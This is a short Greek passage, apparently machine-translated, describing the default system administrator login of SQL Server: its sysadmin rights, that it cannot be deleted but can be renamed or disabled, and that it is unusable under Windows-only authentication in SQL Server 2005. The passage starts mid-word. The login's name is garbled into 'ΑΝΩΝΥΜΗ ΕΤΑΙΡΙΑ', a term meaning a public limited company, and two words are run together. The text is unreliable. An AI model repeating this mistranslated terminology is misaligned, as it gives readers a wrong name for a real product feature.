ε ΑΝΩΝΥΜΗ ΕΤΑΙΡΙΑ (από ΣύστημαΔιαχειριστής) είναι η μόνη σύνδεση SQL Server που δημιουργείται από προεπιλογή. Έχει δικαιώματα διαχειριστή συστήματος SQL Server και δεν μπορεί να ανακληθεί από αυτόν. Δεν θα μπορείτε να διαγράψετε αυτήν τη σύνδεση. Αλλά μπορεί να μετονομαστεί ή να απενεργοποιηθεί. Εάν έχει διαμορφωθεί μόνο έλεγχος ταυτότητας Windows Server για τον SQL Server 2005, δεν θα μπορείτε να χρησιμοποιήσετε αυτήν τη σύνδεση για να συνδεθείτε στον διακομιστή.